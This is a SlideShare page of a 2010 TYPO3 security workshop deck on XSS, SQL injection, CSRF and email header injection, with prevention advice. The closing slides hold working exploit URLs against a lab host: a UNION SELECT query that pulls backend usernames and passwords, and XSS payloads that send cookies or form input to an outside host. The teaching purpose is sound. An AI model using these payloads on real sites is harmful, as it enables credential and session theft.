Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
TYPO3 Developer Days - Elmshorn 2010   Inspiring
Security Workshop                      sha
T3DD10 Security
 Security flaws versus Security concepts
                 02.07.2010



Helmut Hummel <helmut@typo3.org>
Introduction

Do you ...




                           Inspiring people to
T3DD10 Security Workshop   share
Introduction

Do you ...
   ... know me?




                           Inspiring people to
T3DD10 Security Workshop   sha...
Introduction

Do you ...
   ... know me?

   ... have a working development environment?




                             ...
Introduction

Do you ...
   ... know me?

   ... have a working development environment?

   ... ever heared of XSS?




 ...
Introduction

Do you ...
   ... know me?

   ... have a working development environment?

   ... ever heared of XSS?

   ....
Introduction

Do you ...
   ... know me?

   ... have a working development environment?

   ... ever heared of XSS?

   ....
Introduction

Do you ...
   ... know me?

   ... have a working development environment?

   ... ever heared of XSS?

   ....
Introduction

Do you ...
   ... know me?

   ... have a working development environment?

   ... ever heared of XSS?

   ....
Did you ever hack for




                           Inspiring people to
T3DD10 Security Workshop   share
Security Flaws versus Security Concepts


Agenda
   General Security Concepts

   Hacking / Code Review Session

   Gettin...
What is Security?




                           Inspiring people to
T3DD10 Security Workshop   share
Security is not a state




                           Inspiring people to
T3DD10 Security Workshop   share
What is Security?


Security is a process




                           Inspiring people to
T3DD10 Security Workshop   sh...
What is Security?


Security is a process
   The security of an application must be proven
   over time




              ...
What is Security?


Security is a process
   The security of an application must be proven
   over time

   Security must ...
What is Security?


Security is a process
   The security of an application must be proven
   over time

   Security must ...
What is Security?


Security is a process
   The security of an application must be proven
   over time

   Security must ...
What is Security?


Security is a process
   The security of an application must be proven
   over time

   Security must ...
What is Security?


General Security Concepts




                           Inspiring people to
T3DD10 Security Workshop ...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege




                                 ...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
Cross Site Scripting (XSS)




                           Inspiring people to
T3DD10 Security Workshop   share
Cross Site Scripting


XSS




                           Inspiring people to
T3DD10 Security Workshop   share
Cross Site Scripting


XSS
   Persitent/ non persistent XSS




                                   Inspiring people to
T3D...
Cross Site Scripting


XSS
   Persitent/ non persistent XSS

   Injecting Up / Break out of the current DOM
   context



...
Cross Site Scripting


XSS
   Persitent/ non persistent XSS

   Injecting Up / Break out of the current DOM
   context

  ...
Cross Site Scripting


XSS
   Persitent/ non persistent XSS

   Injecting Up / Break out of the current DOM
   context

  ...
Cross Site Scripting


XSS
   Persitent/ non persistent XSS

   Injecting Up / Break out of the current DOM
   context

  ...
Cross Site Scripting


Preventing XSS




                           Inspiring people to
T3DD10 Security Workshop   share
Cross Site Scripting


Preventing XSS
   Input validation and/or filtering is not enough




                              ...
Cross Site Scripting


Preventing XSS
   Input validation and/or filtering is not enough

   Escape correctly, depending on...
Cross Site Scripting


Preventing XSS
   Input validation and/or filtering is not enough

   Escape correctly, depending on...
Email Header Injection




                           Inspiring people to
T3DD10 Security Workshop   share
Email Header Injection


Email Header Injection
   PHP mail() function and From: header

   Use filter_var($mail, FILTER_VA...
SQL Injection (SQLi)




                           Inspiring people to
T3DD10 Security Workshop   share
SQL Injection


SQLi
   (blind) SQL Injections

   Timing attacs

   UNION SELECT

     Example: union select
     1,2,3,4...
SQL Injection


Prevent SQLi




                           Inspiring people to
T3DD10 Security Workshop   share
SQL Injection


Prevent SQLi
   Prepared Statements / PDO




                               Inspiring people to
T3DD10 Se...
SQL Injection


Prevent SQLi
   Prepared Statements / PDO

   Escaping




                               Inspiring people...
SQL Injection


Prevent SQLi
   Prepared Statements / PDO

   Escaping

   Typecasting (intval), whitelist validation




...
SQL Injection


Prevent SQLi
   Prepared Statements / PDO

   Escaping

   Typecasting (intval), whitelist validation

   ...
Cross Site Request Forgery




                           Inspiring people to
T3DD10 Security Workshop   share
Cross Site Request Forgery


CSRF
   Executing arbitrary actions on behalf of a victim

     <img src="http://bank.com/tra...
Cross Site Request Forgery


Prevent CSRF
   Limiting to POST and checking referrer not
   enough
   Double Submit Cookies...
Application Vulnerabilities


More
Application Vulnerabilities


More
                              Information Disclosure
HTTP Response Splitting

         ...
T3DD10 Security Workshop


Rescources
   PHP-Sicherheit (Christopher Kunz and Stefan
   Esser)

   Essential PHP Security ...
T3DD10 Security Workshop


SQLi Exploit
   http://192.168.100.139/introductionpackage/
   t3dd10/pi1/?
   no_cache=1&tx_co...
T3DD10 Security Workshop


XSS Exploit
   http://192.168.100.139/introductionpackage/
   t3dd10/pi2/?
   no_cache=1&tx_coo...
T3DD10 Security Workshop


XSS Exploit
   bit.ly/bpJzpF

   http://192.168.100.139/introductionpackage/
   t3dd10/pi2/?
  ...
inspiring people to share.
T3DD10 Security Workshop
Upcoming SlideShare
Loading in …5
×

T3DD10 Security Workshop

2,090 views

Published on

Slides of the T3DD10 Security Workshop

Published in: Technology, News & Politics
  • Be the first to comment

T3DD10 Security Workshop

  1. 1. TYPO3 Developer Days - Elmshorn 2010 Inspiring Security Workshop sha
  2. 2. T3DD10 Security Security flaws versus Security concepts 02.07.2010 Helmut Hummel <helmut@typo3.org>
  3. 3. Introduction Do you ... Inspiring people to T3DD10 Security Workshop share
  4. 4. Introduction Do you ... ... know me? Inspiring people to T3DD10 Security Workshop share
  5. 5. Introduction Do you ... ... know me? ... have a working development environment? Inspiring people to T3DD10 Security Workshop share
  6. 6. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? Inspiring people to T3DD10 Security Workshop share
  7. 7. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? Inspiring people to T3DD10 Security Workshop share
  8. 8. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? Inspiring people to T3DD10 Security Workshop share
  9. 9. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? ... ever found a vulnerability in a TYPO3 extension? Inspiring people to T3DD10 Security Workshop share
  10. 10. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? ... ever found a vulnerability in a TYPO3 extension? ... reported your findings to security@typo3.org? Inspiring people to T3DD10 Security Workshop share
  11. 11. Did you ever hack for Inspiring people to T3DD10 Security Workshop share
  12. 12. Security Flaws versus Security Concepts Agenda General Security Concepts Hacking / Code Review Session Getting into details about some vulnerabilitiy types Writing down best practices for TYPO3 developers Inspiring people to T3DD10 Security Workshop share
  13. 13. What is Security? Inspiring people to T3DD10 Security Workshop share
  14. 14. Security is not a state Inspiring people to T3DD10 Security Workshop share
  15. 15. What is Security? Security is a process Inspiring people to T3DD10 Security Workshop share
  16. 16. What is Security? Security is a process The security of an application must be proven over time Inspiring people to T3DD10 Security Workshop share
  17. 17. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved Inspiring people to T3DD10 Security Workshop share
  18. 18. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... Inspiring people to T3DD10 Security Workshop share
  19. 19. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... ... but only not insecure at a particular time Inspiring people to T3DD10 Security Workshop share
  20. 20. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... ... but only not insecure at a particular time The „costs“ for security must relate to the possible impacts Inspiring people to T3DD10 Security Workshop share
  21. 21. What is Security? General Security Concepts Inspiring people to T3DD10 Security Workshop share
  22. 22. What is Security? General Security Concepts Minimize Exposure / Least privilege Inspiring people to T3DD10 Security Workshop share
  23. 23. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Inspiring people to T3DD10 Security Workshop share
  24. 24. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Inspiring people to T3DD10 Security Workshop share
  25. 25. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Inspiring people to T3DD10 Security Workshop share
  26. 26. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Inspiring people to T3DD10 Security Workshop share
  27. 27. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Use logging Inspiring people to T3DD10 Security Workshop share
  28. 28. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Use logging Avoid security by obscurity Inspiring people to T3DD10 Security Workshop share
  29. 29. Cross Site Scripting (XSS) Inspiring people to T3DD10 Security Workshop share
  30. 30. Cross Site Scripting XSS Inspiring people to T3DD10 Security Workshop share
  31. 31. Cross Site Scripting XSS Persitent/ non persistent XSS Inspiring people to T3DD10 Security Workshop share
  32. 32. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Inspiring people to T3DD10 Security Workshop share
  33. 33. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Inspiring people to T3DD10 Security Workshop share
  34. 34. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Stay in the current context, but use the possibiities Inspiring people to T3DD10 Security Workshop share
  35. 35. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Stay in the current context, but use the possibiities <img src="javascript:alert(document.cookie)" / > Inspiring people to T3DD10 Security Workshop share
  36. 36. Cross Site Scripting Preventing XSS Inspiring people to T3DD10 Security Workshop share
  37. 37. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Inspiring people to T3DD10 Security Workshop share
  38. 38. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Escape correctly, depending on the context Inspiring people to T3DD10 Security Workshop share
  39. 39. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Escape correctly, depending on the context <script>...NEVER PUT UNTRUSTED DATA HERE...</script> <img src=“... OR HERE ...“ /> ... because then you‘re doomed Inspiring people to T3DD10 Security Workshop share
  40. 40. Email Header Injection Inspiring people to T3DD10 Security Workshop share
  41. 41. Email Header Injection Email Header Injection PHP mail() function and From: header Use filter_var($mail, FILTER_VALIDATE_EMAIL) do not allow chr(10) or chr(13) Inspiring people to T3DD10 Security Workshop share
  42. 42. SQL Injection (SQLi) Inspiring people to T3DD10 Security Workshop share
  43. 43. SQL Injection SQLi (blind) SQL Injections Timing attacs UNION SELECT Example: union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,user name,password,0 from be_users where admin in(1) Check your TypoScript! Inspiring people to T3DD10 Security Workshop share
  44. 44. SQL Injection Prevent SQLi Inspiring people to T3DD10 Security Workshop share
  45. 45. SQL Injection Prevent SQLi Prepared Statements / PDO Inspiring people to T3DD10 Security Workshop share
  46. 46. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Inspiring people to T3DD10 Security Workshop share
  47. 47. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Typecasting (intval), whitelist validation Inspiring people to T3DD10 Security Workshop share
  48. 48. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Typecasting (intval), whitelist validation Using an ORM (extbase, FLOW3, QCodo, ...) Inspiring people to T3DD10 Security Workshop share
  49. 49. Cross Site Request Forgery Inspiring people to T3DD10 Security Workshop share
  50. 50. Cross Site Request Forgery CSRF Executing arbitrary actions on behalf of a victim <img src="http://bank.com/transfer.do? acct=MARIA&amount=100000" width="1" height="1" border="0"> stored CSRF (like XSS) Targeted Emails Requires probably some kind of social engineering Inspiring people to T3DD10 Security Workshop share
  51. 51. Cross Site Request Forgery Prevent CSRF Limiting to POST and checking referrer not enough Double Submit Cookies Challenge-Response Synchronizer Token Pattern No Cross-Site Scripting (XSS) Vulnerabilities
  52. 52. Application Vulnerabilities More
  53. 53. Application Vulnerabilities More Information Disclosure HTTP Response Splitting Path Traversal Privilege Escalation Session Fixation LPAP Injection Remote Code Execution
  54. 54. T3DD10 Security Workshop Rescources PHP-Sicherheit (Christopher Kunz and Stefan Esser) Essential PHP Security (Chris Shiflett) http://www.owasp.org/ http://www.ibm.com/developerworks/ opensource/library/os-php-secure-apps/ index.html http://www.owasp.org/index.php/ Category:OWASP_WebGoat_Project Inspiring people to T3DD10 Security Workshop share
  55. 55. T3DD10 Security Workshop SQLi Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi1/? no_cache=1&tx_coolextension_pi1[showUid]=1%2 0UNION%20SELECT%20uid,%20pid,%20tstamp, %20crdate,%20cruser_id,uid%20as %20t3ver_oid,uid%20as%20t3ver_id,uid%20as %20t3ver_wsid,uid%20as%20t3ver_label,uid%20as %20t3ver_state,%20uid%20as%20t3ver_stage,uid %20as%20t3ver_count,uid%20as %20t3ver_tstamp,uid%20as%20t3_origuid,uid %20as%20sys_language_uid,uid%20as %20l10n_parent,uid%20as %20l10n_diffsource,deleted,disable%20as %20hidden,starttime,endtime,%20usergroup%20as %20fe_group,username%20as
  56. 56. T3DD10 Security Workshop XSS Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3Cscript %3Ewindow.location.href+%3D+%27http%3A%2F %2Ftypo3.org%2F%3Fcookie%3D%27+%2B +document.cookie%3B%3C%2Fscript%3E
  57. 57. T3DD10 Security Workshop XSS Exploit bit.ly/bpJzpF http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3C%2Fform %3E%3Cform+action%3D%22http%3A%2F %2Ftypo3.org%22%3E%3Cinput+type%3D%22text %22+name%3D%22name
  58. 58. inspiring people to share.

×